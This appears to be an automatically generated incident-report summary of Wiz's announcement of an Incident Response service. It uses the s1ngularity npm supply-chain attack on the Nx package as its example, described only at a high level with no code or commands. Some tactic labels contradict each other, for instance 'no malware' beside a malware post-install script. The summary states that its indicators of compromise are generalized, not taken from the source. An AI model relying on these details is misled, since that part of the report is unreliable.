Full Report
Announcing the public preview of Wiz’s in-house Incident Response service—empowering customers to investigate, contain, and resolve cyber incidents with confidence
Analysis Summary
The provided text is an announcement for the public preview of the Wiz Incident Response service, focusing on their capabilities in responding to **cloud security incidents**, using the recent **s1ngularity supply chain attack** as a real-world example to demonstrate expertise. The document does not detail a *specific* past incident that Wiz responded to; rather, it profiles the *launch* of their service and their general methodology based on observed threats.
Therefore, the summary below is constructed based on the **Wiz service announcement and the case study example mentioned (s1ngularity)**, as that is the only concrete event described in detail.
# Incident Report: Wiz IR Service Launch & s1ngularity Threat Profile
## Executive Summary
Wiz announced the public preview of its dedicated Incident Response (IR) service, leveraging deep cloud security expertise to help organizations investigate, contain, and recover from cloud-native breaches quickly. The announcement profiled the threat landscape by referencing the August 2025 s1ngularity supply chain attack, where malicious versions of the Nx build system package were published to npm to steal developer assets via post-installation scripts.
## Incident Details
- **Discovery Date:** Not applicable (Announcement Date: September 17, 2025)
- **Incident Date (s1ngularity Reference):** August 26, 2025
- **Affected Organization:** Multiple organizations dependent on the compromised npm package were potentially affected.
- **Sector:** Technology/Software Development (Supply Chain Attack affecting build systems)
- **Geography:** Global (npm registry)
## Timeline of Events
### Initial Access (s1ngularity Reference)
- **Date/Time:** On or around August 26, 2025
- **Vector:** Software Supply Chain Attack (compromised public package registry)
- **Details:** Malicious versions of the Nx build system package were published to the npm registry.
### Lateral Movement (s1ngularity Reference)
- **Details:** Malware ran as a post-installation script, leveraging AI command-line tools for reconnaissance within the affected developer environment.
### Data Exfiltration/Impact (s1ngularity Reference)
- **Details:** Sensitive developer assets were harvested, including cryptocurrency wallets, GitHub and npm tokens, and SSH keys. Data was exfiltrated to a publicly accessible location.
### Detection & Response (Wiz IR Service Focus)
- **Detection:** Wiz Defend and Runtime Sensor capabilities are cited for alerting on such attacks.
- **Response Actions:** The new Wiz IR service offers scoping, forensic investigation, containment, remediation, and ongoing monitoring.
## Attack Methodology (Based on s1ngularity Reference)
- **Initial Access:** Supply Chain compromise (publishing malicious package to npm).
- **Persistence:** Post-installation script executed upon the target installing the compromised package.
- **Privilege Escalation:** Not explicitly detailed, but sensitive credentials were targeted.
- **Defense Evasion:** Living "off the cloud" (not deploying malware but leveraging existing functions).
- **Credential Access:** Harvesting tokens (GitHub, npm) and SSH keys.
- **Discovery:** Reconnaissance aided by AI command-line tools.
- **Lateral Movement:** Not detailed.
- **Collection:** Gathering developer assets (wallets, tokens, keys).
- **Exfiltration:** Data sent to a publicly accessible location.
- **Impact:** Theft of sensitive authentication materials and financial assets.
## Impact Assessment (s1ngularity Reference)
- **Financial:** Potential loss via cryptocurrency wallets.
- **Data Breach:** Developer authentication tokens (GitHub, npm) and SSH keys.
- **Operational:** Compromise of developer environments, potential for further systemic exploitation through stolen keys.
- **Reputational:** Damage to trust in the software supply chain.
## Indicators of Compromise
*Note: Since the article is an announcement, specific IoCs are not provided; these are generalized based on the attack type described.*
- **Network indicators:** Connections to publicly accessible IP addresses used for exfiltration.
- **File indicators:** Execution of post-installation script from the compromised npm package payload.
- **Behavioral indicators:** Use of AI command-line tools for environment inspection.
## Response Actions (Defined by Wiz IR Offering)
- **Containment measures:** Identifying all systems that executed the malicious package.
- **Eradication steps:** Revocation and rotation of all harvested tokens and keys.
- **Recovery actions:** Strengthening dependency scanning and artifact integrity checks.
## Lessons Learned
- Cloud environments require specialized response due to ephemeral infrastructure and complex IAM configurations.
- Attackers are leveraging software supply chain mechanisms (like npm) for initial access.
- Attackers prefer "living off the cloud" to avoid traditional malware signatures.
## Recommendations
- Implement strong cloud-native detection capabilities (like Wiz Defend/Runtime Sensor) to monitor runtime behavior.
- Thoroughly vet dependencies leveraged in development pipelines, specifically looking for anomalies in package installation scripts.
- Establish proven cloud-specific incident response plans covering ephemeral data preservation and complex IAM tracing.